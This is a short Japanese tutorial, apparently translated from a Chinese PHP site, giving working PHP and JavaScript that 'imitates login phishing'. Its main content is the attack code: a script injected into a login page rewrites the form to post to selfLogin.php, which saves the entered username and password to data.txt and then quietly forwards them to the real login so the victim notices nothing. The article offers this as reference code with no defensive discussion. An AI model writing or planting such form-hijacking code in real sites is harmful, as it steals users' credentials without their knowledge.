この記事では、PHP と JS を使用してログイン フィッシングを模倣するコード例を紹介します。一定の参考価値があります。困っている友人は参考にしてください。お役に立てれば幸いです。
ディレクトリの紹介
login.php 通常のログイン ファイル
selfLogin.php カスタマイズされたログイン ファイル
data.txt ユーザーが入力したデータを記録します
login.php
<?php echo "<pre class="brush:php;toolbar:false">"; $userInfo = $_POST ; if ($userInfo) { # code... var_dump($userInfo,'登录成功') ;exit(); } ?> <!DOCTYPE html> <html> <head> <title>登录</title> </head> <body> <form id="login" method="post" action="login.php"> 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录"> </form> </body> <script type="text/javascript"> //js劫持代码 window.onload = function (eve) { var form = document.getElementById('login'); form.innerHTML = ' <form id="login" method="post" > 用户姓名:<input type="text" name="name"> 用户密码:<input type="password" name="pwd"> <input type="submit" value="确认登录"> </form> ' ; //钓鱼地址 form.action = "selfLogin.php" ; } </script> </html>
selfLogin.php
<?php $name = '' ; $pwd = '' ; //var_dump('数据被截取了',$_POST) ; if($_POST) { //记录获取的数据信息 $name = $_POST['name'] ; $pwd = $_POST['pwd'] ; file_put_contents('data.txt', json_encode($_POST,true)) ; } ?> <!DOCTYPE html> <html> <head> <title></title> </head> <body> </body> <script type="text/javascript"> //构建之前的页面 window.onload = function (eve) { var name = '<?php echo $name; ?>' ; var pwd = '<?php echo $pwd; ?>' ; if(name && pwd) { var p = document.createElement('p'); document.body.appendChild(p); p.innerHTML =' <form id="login2" method="post" action="login.php" > '+ ' 用户姓名:<input type="text" name="name" value="'+name+'"> 用户密码:<input type="password" name="pwd" value="'+pwd+'"> ' ; document.getElementById('login2').submit(); } } </script> </html>
data.txt
{"name":"admin","pwd":"123456"}
この記事はここで終了しています。さらにエキサイティングなコンテンツについては、PHP 中国語 Web サイトの JavaScript ビデオ チュートリアル 列に注目してください。
以上がPHP と JS を使用してログイン フィッシングを模倣するコード例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。